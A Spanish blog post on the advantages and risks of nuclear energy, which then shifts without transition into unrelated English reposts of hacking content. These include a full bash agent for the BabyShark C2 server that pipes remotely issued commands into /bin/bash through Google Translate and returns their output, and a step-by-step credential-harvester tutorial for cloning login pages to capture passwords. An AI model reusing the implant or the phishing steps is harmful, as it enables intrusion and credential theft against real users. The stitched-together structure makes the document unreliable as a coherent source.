Ventajas Y Riesgos De La Energía Nuclear


Playa de la Almadraba con la central nuclear de Valdellós al fondo. Fuente: El País.

Ventajas de la energía nuclear

En el mundo actual se ha disparado el consumo de electricidad: la iluminación de espacios públicos y privados, el uso de electrodomésticos y aires acondicionados, el funcionamiento de maquinaria, etc. En dicho contexto, determinados sectores científicos y políticos defienden la energía nuclear como la mejor opción energética a la hora de producir esa electricidad en un mundo como el actual.

- No emite gases de efecto invernadero, por lo que se trataría de una alternativa energética al uso de combustibles fósiles (petróleo o carbón), culpables de la mayoría de las emisiones de dichos gases (dióxido de carbono, óxido nitroso) que producen el actual cambio del clima de la tierra. En este sentido, el uso sistemático de la energía nuclear puede colaborar activamente en la reducción del calentamiento global. Como prueba de ello, está el hecho de que tras el accidente ocurrido en el 2011 en la central nuclear japonesa de Fukhusima, algunos países han apostado por ir progresivamente cerrando sus centrales nucleares, y ante la volatilidad de las energías alternativas, han vuelto a desarrollar las centrales térmicas de carbón. Así, y desde 2013, Alemania produce cerca de la mitad de su energía en centrales térmicas de carbón. Aún así, hay que dejar claro que la mayoría de las actuales emisiones de Co2 proceden de los motores de los vehículos de transportes, por lo que el impacto de las emisiones de las centrales térmicas en el calentamiento climático es limitado.
Central térmica alemana de carbón de Grevenbroich-Neurath. Tras el accidente de Fukishima, Alemania ha ido
 sustituyendo la energía nuclear por la del carbón, volviendo a los combustibles fósiles. Fuente: www.ine.es
- Se trata de una fuente energética agotable, básicamente dependiente de un mineral como el uranio, que es escaso y del que quedan reservas actualmente para unos 80 años, pero resulta atractivo porque con poco combustible se consigue mucha energía, lo que implica un claro ahorro y reducción de costes en lo que respecta a la extracción, transporte y uso de la materia prima. Dicho ahorro abarata la producción de energía, aunque ésta se vuelve a encarecer por las fuertes inversiones que exigen las centrales nucleares., cuya vida útil es limitada, tres o cuatro décadas, después hay que desmantelarlas. Eso exige la construcción posterior de nuevos reactores operativos. A pesar de todo, la energía eléctrica nuclear sigue resultando bastante barata.

- Frente a la otra gran alternativa energética, la de las energías renovables, resulta igualmente atractiva porque es independiente de las condiciones naturales (caudal de agua disponible en los ríos, horas de sol o intensidad del viento, por ejemplo). En este sentido, una central nuclear produce energía de forma continua y constante, prácticamente durante todo el día y a lo largo de todo el año, sin altibajos, lo que permite planificar la producción energética y conseguir precios estables y previsibles.
Planta solar de la compañía Sunedison en el norte de Chile. Fuente: Taringa.

- Todos estos aspectos convierten la energía nuclear en la más barata. Según las cifras de la OCDE, en Europa la energía atómica representa unos 60 dólares de media por megavatio, frente a los 80 del carbón, los 90 del gas o los 120 de la eólica terrestre. En otros continentes esos costes son diferentes, todavía incluso más baratos, pero en todos ellos la energía nuclear resulta la menos costosa.

Todo ello hace que sea una energía especialmente atractiva para países que carecen de grandes reservas de petróleo, y que consiguen así reducir la dependencia energética del exterior, es decir, que ganan autonomía energética al producir una parte importante de la energía que consumen gracias a sus centrales nucleares, sin necesidad de importarla o traerla de fuera. Este es el caso de países como Japón (25% de la energía producida es de origen nuclear), Corea (30%), Finlandia (30%), España (20%), Gran Bretaña (17%).y sobre todo Francia (77%).
Esto la hace especialmente atractiva también para países emergentes, consumidores crecientes de energía como China, Brasil o India. Por ella también han apostado grandes productores de combustibles fósiles, que no se han querido quedar atrás en el acceso a la energía nuclear por motivos estratégicos, es el caso de EE.UU., Canadá o Rusia.
Central nuclear china de Quinshan, en la provincia de Zheijang. Fuente: elperiodicodelaenergía.com

La central nuclear de Gravelines, situada en la zona de Dunkerque, es la mayor de Francia y una de las mayores del mundo. Cuenta con seis reactores nucleares. Fuente: Wikimedia.



Riesgos de la energía nuclear

A pesar de sus ventajas, el movimiento ecologista y una parte importante de la opinión pública y la comunidad científica son abiertos enemigos de este tipo energía. Es evidente que los desastres nucleares son poco frecuentes y en general las medidas de seguridad y mantenimiento suelen ser importantes. Sin embargo, los riesgos que suponen los accidentes nucleares, con el consiguiente escape de radiactividad, son demasiado elevados por tres razones fundamentales:

- La radiactividad es muy volátil y puede extenderse con facilidad a través de los vientos a lo largo de cientos de kilómetros y afectar un área muy extensa. De esta forma, zonas muy lejanas pueden verse seriamente afectadas por la radiactividad, mientras otras relativamente cercanas apenas se ven contaminadas. En ocasiones la contaminación resulta muy aleatoria y el grado de contaminación varía sin aparente lógica, debido a las condiciones del viento, la temperatura o los materiales de la zona: así en una misma área de varios km2 se pueden tener distintos niveles de radiacción. Esto ocurrió durante el accidente de la central soviética de Chernobyl en abril de 1986, la explosión de su reactor número 4 provocó la emisión masiva de radiactividad a la atmósfera, pero mientras se registraban altos niveles de radiación a miles de kilómetros, en Escandinavia o los Alpes centroeuropeos, algunas regiones de la misma Ucrania apenas se vieron afectadas.

Las zonas más afectadas por la radiación se encontraban en el norte de Ucrania y el sureste de Bielorrusia.
Fuente: ratical.org

Extensión  de la radiactividad tras el accidente de Chernobyl. Algunas de las zonas más afectadas se encontraban en lugares tan alejados como Escandinavia o Austria. Fuente: tekknorg.files.wordpress.com

- La contaminación puede prolongarse durante muchísimo tiempo, incluso siglos. Algunos isótopos radiactivos tienen poca vigencia temporal, pero otros como el cesio 137 se mantienen durante décadas,  y algunoscomo el plutonio incluso durante miles de años.

- La radiactividad contamina todo el ecosistema en las zonas más afectadas. El aire se ve contaminado y después las precipitaciones pueden arrastrar hasta el suelo las partículas contaminadas, se contaminan así bosques, prados y zonas agrícolas, se contaminan las aguas de ríos y lagos, e incluso las aguas subterráneas. Por eso, tras un accidente nuclear las personas y animales directamente afectados por la radiación pueden morir o sufrir gravísimas dolencias y enfermedades de inmediato, pero tales efectos pueden extenderse en el tiempo a los que no han sufrido las consecuencias directas de la contaminación, a través del consumo de agua contaminada o de alimentos como la leche o la carne de animales que se han visto afectados o que se han alimentado en el área afectada. Se multiplican así, los casos de cáncer o tumores malignos entre la población o las malformaciones entre los recién nacidos. Un ejemplo trágico de tal realidad lo encontramos en las zonas de Ucrania y Bielorrusia más afectadas por el desastre de la central soviética de Chernobyl.

Esta metáfora visual representa a la perfección la contaminación radiactiva producida tras un accidente nuclear.
Fragmento del cartel publicitario de la película "Chernobyl diaries".

- El otro gran problema generado por la energía nuclear es el almacenamiento y tratamiento de los materiales radiactivos y los residuos radiactivos generados por las centrales nucleares. Los residuos de "alta actividad", considerados los más peligrosos, proceden de combustible nuclear gastado que se extrae del reactor y se almacenan durante años en piscinas de agua, confeccionadas con hormigón y acero inoxidable y situados en la misma central nuclear. Su final estará bajo tierra, almacenados durante centenares de años en bidones blindados confeccionados con materiales especiales anticorrosión. Los residuos de media y baja radiactividad (estos últimos ropas o herramientas usadas en determinadas labores) se concentran en bidones de acero que después se depositan en almacenes nucleares (en el caso de España en el almacén de El cabril en Córdoba, gestionado por ENRESA, entidad pública que se encarga de la gestión de los residuos nucleares de las centrales españolas). El proyecto de crear un almacén para los residuos de alta actividad en el pueblo conquense de Villar de Cañas, hoy está paralizado, por la hostilidad del gobierno regional de Castilla-La Mancha y el rechazo popular.
Todos conocemos los escapes radiactivos en las centrales nucleares pero también ha habido accidentes en las instalaciones de almacenamiento nuclear. Ese fue el caso en 1973 de las instalaciones de Hanford Site, en Estados Unidos, donde más de 400.000 litros de residuos líquidos radiactivos se escaparon de un tanque de almacenamiento, produciendo la contaminación de una amplia zona a su alrededor. Sin embargo, los mayores problemas surgieron en las instalaciones de almacenamiento de material radiactivo de la antigua URSS, que dejaban mucho que desear en materia de seguridad y que se preocupaban muy poco por el medio ambiente. El accidente de Kyshtym fue el más terrible, en 1957, en plena Guerra fría. Un fallo en los precarios sistemas de enfriamiento, provocó una explosión en un contenedor que albergaba los deshechos altamente radiactivos de la central nuclear de MAYAK. Se produjo entonces un escape de radiacción, que contaminó una extensa zona, provocando la evacuación de miles de personas y la muerte de un número indeterminado de ellas.

Centro de almacenamiento nuclear de El Cabril (Córdoba). Interior de la estructura para residuos de muy baja actividad. Fuente:www.enresa.es






Todos estos peligros han generado un rechazo masivo a la energía nuclear, sobre todo en los países más desarrollados de Europa occidental. Esto se evidencia, por un lado, en las dificultades que los países tienen para encontrar un lugar donde ubicar los llamados "cementerios nucleares" (es el caso del Almacén Centralizado de Residuos Nucleares de Alta Actividad de Villar de cañas en Cuenca); por otro lado, en la presión de la opinión publica para que no se alargue la vida útil de las centrales. Al respecto, la opinión pública española se haya inmersa en un debate sobre la necesidad o no de prolongar la actividad de la central nuclear de Garoña. Ésta fue inaugurada en 1971 y se cerró en diciembre de 2012, tras haber sobrepasado los 40 años de vida útil de las centrales españolas. Para conocer mejor dicha problemática podemos consultar otra entrada de este blog; La energía nuclear en España y en el mundo.
Algunos países, donde la opinión pública es más hostil a la energía nuclear, han terminado por iniciar un movimiento de cierre paulatino de las centrales y reactores nucleares existentes y se han comprometido a no abrir ningún otro reactor. A esta política se acogió primero Suecia, y más tarde también Italia, Bélgica, Alemania y Nueva Zelanda. En la actualidad, países como Polonia, Austria, Holanda o España se han comprometido también a no construir nuevos reactores y a no sustituir las centrales que se vayan cerrado por envejecimiento.

Manifestación por el cierre definitivo de la central nuclear de Garoña. Fuente:público.es

Related links

Top 16 Hacker Blog list for Hackers 2018

  • HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
  • SecurityFocus: Provides security information to all members of the security community, from end users, security hobbyists and network administrators to security consultants, IT Managers, CIOs and CSOs.
  • NFOHump: Offers up-to-date .NFO files and reviews on the latest pirate software releases.
  • Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
  • Phrack Magazine: Digital hacking magazine.
  • Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
  • Offensive Security Training: Developers of Kali Linux and Exploit DB, and the creators of the Metasploit Unleashed and Penetration Testing with Kali Linux course.
  • SecTools.Org: List of 75 security tools based on a 2003 vote by hackers.
  • Hack Forums: Emphasis on white hat, with categories for hacking, coding and computer security.
  • DEFCON: Information about the largest annual hacker convention in the US, including past speeches, video, archives, and updates on the next upcoming show as well as links and other details.
  • Hakin9: E-magazine offering in-depth looks at both attack and defense techniques and concentrates on difficult technical issues.
  • The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
  • Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the worlds best penetration testing software now.
  • KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
  • Black Hat: The Black Hat Briefings have become the biggest and the most important security conference series in the world by sticking to our core value: serving the information security community by delivering timely, actionable security information in a friendly, vendor-neutral environment.
  • Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.

BabyShark - Basic C2 Server


This is a basic C2 generic server written in Python and Flask.
This code has based ideia to GTRS, which uses Google Translator as a proxy for sending commands to the infected host. The BabyShark project aims to centralize reverse connections with agents, creating a way to centralize several types of connections in one place.
BabyShark does not generate infection agents, but it does offer a template to connect to it.

INSTALL
git clone https://github.com/danilovazb/BabyShark/
cd BabyShark
mkdir database
sqlite3 database/c2.db < schema.sql

AGENTS MODEL

GTRS - https://github.com/mthbernardes/GTRS
This client example from GTRS for connect to BabyShark:
#!/bin/bash

if [[ $# < 2 ]];then
echo -e "Error\nExecute: $0 www.c2server.com secretkey-provided-by-the-server\n"
exit
fi

running=true
secretkey="b4bysh4rk"
user_agent="User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36"
data="Content-Hype: "
c2server="http://babyshark/momyshark?key=$secretkey"
result=""
input="/tmp/input"
output="/tmp/output"

function namedpipe(){
rm "$input" "$output"
mkfifo "$input"
tail -f "$input" | /bin/bash 2>&1 > $output &
}

function getfirsturl(){
url="https://translate.google.com/translate?&anno=2&u=$c2server"
first=$(curl --silent "$url" -H "$user_agent" | xmllint --html --xpath '//iframe/@src' - 2>/dev/null | cut -d "=" -f2- | tr -d '"' | sed ' s/amp;//g' )
}

function getsecondurl(){
second=$(curl --silent -L "$first" -H "$user_agent" | xmllint --html --xpath '//a/@href' - 2>/dev/null | cut -d "=" -f2- | tr -d '"' | sed 's/amp;//g')
}

function getcommand(){
if [[ "$result" ]];then
command=$(curl --silent $second -H "$result" )
else
command=$(curl --silent $second -H "$user_agent" )

command1=$(echo "$command" | xmllint --html --xpath '//span[@class="google-src-text"]/text()' - 2>/dev/null)
command2=$(echo "$command" | xmllint --html --xpath '/html/body/main/div/div/div/div/ul/li/span/text()' - 2>/dev/null )
if [[ "$command1" ]];then
command="$command1"
else
command="$command2"
fi
fi
}

function talktotranslate(){
getfirsturl
getsecondurl
getcommand
}

function main(){
result=""
sleep 10
talktotranslate
if [[ "$command " ]];then
if [[ "$command" == "exit" ]];then
running=false
fi
echo $command
echo -n > $output
idcommand=$(echo $command | cut -d '#' -f2)
echo "$command" > "$input"
sleep 2
outputb64=$(cat $output | tr -d '\000' | base64 | tr -d '\n' 2>/dev/null)
if [[ "$outputb64" ]];then
result="$user_agent | $outputb64 | $idcommand "
talktotranslate
fi
fi
}

namedpipe
while "$running";do
main
done


NEXT STEPS
  • SSH Reverse
  • DNS
  • DOH
  • HTTPS
  • HTTP3
  • ICMP
  • QUIC




via KitPloitRelated links
  1. Hacking Images
  2. Hacker Wifi Password
  3. Pentest Jobs
  4. Basic Pentest 1 Walkthrough
  5. How To Pentest A Website With Kali
  6. How To Pentest A Website
  7. Hacking Bluetooth
  8. Pentest Windows 7
  9. Hacker Attack
  10. Hackerrank Sql
  11. Pentest Android App

Web-fu - The Ultimate Web Hacking Chrome Extension

Web-fu Is a web hacking tool focused on discovering and exploiting web vulnerabilitites.

 BROWSER INTEGRATION 

This tool has many advantages, as a browser-embedded webhacking tool, is very useful for scanning browser-authenticated applications, if browser can authenticate and access to the web application, the tool also can. Note that some other tools do not support neither certificate authentication nor web vpn accesses.
The integration with chrome, provides a more comfortable and agile way of web-hacking, and you have all the application data loaded on the hacking tool, you don't need to copy the url, cookies, etc. to the tool, just right click and hack.
The browser rendering engine is also used in this tool, to draw the html of the responses.


 FALSES POSITIVES 

When I coded this tool, I was obsessed with false positives, which is the main problem in all detection tools.  I have implemented a gauss algorithm, to reduce the faslse positives automatically which works very very well, and save a lot of time to the pentester.


 VIDEO 

 Here is a video, with some of the web-fu functionalitites:

 VISUAL FEATURES 

This tool has a visual crawler. Normal crawlers doesn't parse the ajvascript, this tool does. The visual crawler loads each link of the web site, rendering the html and executing all the javascript as a normal load, then the links are processed from he DOM and clicked.
A visual form cracker, is also available, althow is experimental and only works on some kind of forms.


 SCANNING FEATURES

The web-fu's portscanner, has a database of a common web ports, like 80,81,8080 and so on.
The cracker module, can bruteforce web directories to find new attack vectors, and can fuzz get and post parameters for discovering vulns, and also crack passwords. There are 9 preloaded wordlists, and you can also load a custom wordlist. Prefilters, falsepositive reductor and render will be helpful. The scanners support SSL, if the website can be loaded in the chrome, can be scanned by web-fu.


ENCODERS & DECODERS

The supported encoders and decoders are: base64, urlescape and urlencode


OTHER FEATURES

A web notepad is available, saving the information on the browser localStorage, there is one notepad per site. A cookie editor is also very useful for pentesting. The inteceptor, is like a web proxy but from the inside of the browser, you can intercept a request There is also a session locker and a exploit web search.


CHROME STORE 
Here is the link to the chrome store, the prize is about one euro, very cheap if you compare with other scanners: Web-Fu on Chrome Store


 With webfu, you will do the best web site pentest and vulnerability assessment.


Related links


BurpSuite Introduction & Installation



What is BurpSuite?
Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications. Because of its popularity and breadth as well as depth of features, we have created this useful page as a collection of Burp Suite knowledge and information.

In its simplest form, Burp Suite can be classified as an Interception Proxy. While browsing their target application, a penetration tester can configure their internet browser to route traffic through the Burp Suite proxy server. Burp Suite then acts as a (sort of) Man In The Middle by capturing and analyzing each request to and from the target web application so that they can be analyzed.











Everyone has their favorite security tools, but when it comes to mobile and web applications I've always found myself looking BurpSuite . It always seems to have everything I need and for folks just getting started with web application testing it can be a challenge putting all of the pieces together. I'm just going to go through the installation to paint a good picture of how to get it up quickly.

BurpSuite is freely available with everything you need to get started and when you're ready to cut the leash, the professional version has some handy tools that can make the whole process a little bit easier. I'll also go through how to install FoxyProxy which makes it much easier to change your proxy setup, but we'll get into that a little later.

Requirements and assumptions:

Mozilla Firefox 3.1 or Later Knowledge of Firefox Add-ons and installation The Java Runtime Environment installed

Download BurpSuite from http://portswigger.net/burp/download.htmland make a note of where you save it.

on for Firefox from   https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/


If this is your first time running the JAR file, it may take a minute or two to load, so be patient and wait.


Video for setup and installation.




You need to install compatible version of java , So that you can run BurpSuite.
More info

SubOver - A Powerful Subdomain Takeover Tool


Subover is a Hostile Subdomain Takeover tool designed in Python. From start, it has been aimed with speed and efficiency in mind. Till date, SubOver detects 36 services which is much more than any other tool out there. The tool is multithreaded and hence delivers good speed. It can easily detect and report potential subdomain takeovers that exist. The list of potentially hijackable services is very comprehensive and it is what makes this tool so powerful.

Installing
You need to have Python 2.7 installed on your machine. The following additional requirements are required -
  • dnspython
  • colorama
git clone https://github.com/Ice3man543/SubOver.git .
cd SubOver
# consider installing virtualenv
pip install -r requirements.txt
python subover.py -h

Usage
python subover.py -l subdomains.txt -o output_takeovers.txt
  • -l subdomains.txt is the list of target subdomains. These can be discovered using various tool such as sublist3r or others.
  • -o output_takeovers.txtis the name of the output file. (Optional & Currently not very well formatted)
  • -t 20 is the default number of threads that SubOver will use. (Optional)
  • -V is the switch for showing verbose output. (Optional, Default=False)

Currently Checked Services
  • Github
  • Heroku
  • Unbounce
  • Tumblr
  • Shopify
  • Instapage
  • Desk
  • Tictail
  • Campaignmonitor
  • Cargocollective
  • Statuspage
  • Amazonaws
  • Cloudfront
  • Bitbucket
  • Squarespace
  • Smartling
  • Acquia
  • Fastly
  • Pantheon
  • Zendesk
  • Uservoice
  • WPEngine
  • Ghost
  • Freshdesk
  • Pingdom
  • Tilda
  • Wordpress
  • Teamwork
  • Helpjuice
  • Helpscout
  • Cargo
  • Feedpress
  • Freshdesk
  • Surge
  • Surveygizmo
  • Mashery
Count : 36

FAQ
Q: What should my wordlist look like?
A: Your wordlist should include a list of subdomains you're checking and should look something like:
backend.example.com
something.someone.com
apo-setup.fxc.something.com

Your tool sucks!
Yes, you're probably correct. Feel free to:
  • Not use it.
  • Show me how to do it better.

Contact
Twitter: @Ice3man543

Credits


More info

Any Indian DigiLocker Account Could've Been Accessed Without Password

The Indian Government said it has addressed a critical vulnerability in its secure document wallet service Digilocker that could have potentially allowed a remote attacker to bypass mobile one-time passwords (OTP) and sign in as other users to access their sensitive documents stored on the platform. "The OTP function lacks authorization which makes it possible to perform OTP validation with

via The Hacker News

More articles


TYPES OF HACKING

Types of hacking?
We can segregate hacking into different categories, based on what being hacked. Here is a set of examples-

1-Website Hacking- Hacking a website means taking unauthorized control over a web server and its associated software such as databases and other interfaces.

2-Network Hacking-Hacking a network means gathering information about a network by using tool like Telnet, Nslookup, Ping, Tracert, Netstat etc with the intent to harm the network system and hamper its operation.

3-Email Hacking-It includes getting unauthorized access on an Email account and using it without taking the permission of the owner.

4-Ethical Hacking-It involves finding weakness in a computer or network system for testing purpose and finally getting them fixed.

5-Password Hacking-This is the process of recovering secret password from data that has been stored in or transmitted by a computer system.

6-Computer Hacking-This is the process of stealing computer ID & Passwords by applying hacking methods and getting unauthorized access to a computer system.
More articles
  1. Hacker Website
  2. Hacking Typer
  3. Hacker Google
  4. Hacking Hardware
  5. Pentest Practice Sites
  6. Pentest Dns
  7. Pentest Red Team
  8. Hacking Site
  9. Pentest Tutorial
  10. Hacking Page
  11. Hacking Health
  12. Pentest Vs Ceh

HACKING PASSWORDS USING CREDENTIAL HARVESTER ATTACK

Everything over the internet is secured by the passwords. You need a login to do any stuff on any social or banking website. Passwords are the first security measure for these type of websites. So, I brought a tutorial on how to hack such sort of login passwords. This tutorial is based on credential harvester attack method. In which you will know about hacking passwords using credential harvester attack method.

HACKING PASSWORDS USING CREDENTIAL HARVESTER ATTACK

REQUIREMENTS

It's very simple and easy to follow. Before you start, you need the following things to work with.
  1. Kali Linux OS
  2. Target Website

STEPS TO FOLLOW

  • Run the Kali Linux machine. If you have not Kali Linux installed, you can grab a free copy and install it as a virtual machine. You can learn more about Kali Linux VirtualBox installation.
  • Sign in to Kali Linux by entering username root and password toor.
  • As you'll sign in, navigate to the Applications > Social Engineering Tools > Social Engineering as shown in the following screenshot.
  • Now you will see the different options. You have to choose Social Engineering Attacks by simply entering its number in the terminal. Once you do it, it will show a few options further. Simply choose Website Vector Attack by putting its number.
  • Website vector attack will show up it's a different type of attacks. We are going to use Credential Harvester Attack.
  • Choose the Site Clone option. As you do it, it will ask for your public IP address. Just open up a new terminal and type ifconfig. It'll show the public IP. Just copy it and paste in the previous terminal as shown in the following screenshots.
  • After we do it. Enter the target website of which passwords you want to hack. Make sure to use a website that has username and password on the same page.
  • All done now. As someone opens up the browser on the public IP we specified, it'll show up the website that we entered in the previous step. Now as someone enters their username or password, it will be captured in the terminal.

That's all. If you're not clear yet. You can watch the following complete video tutorial on how to do it.
More information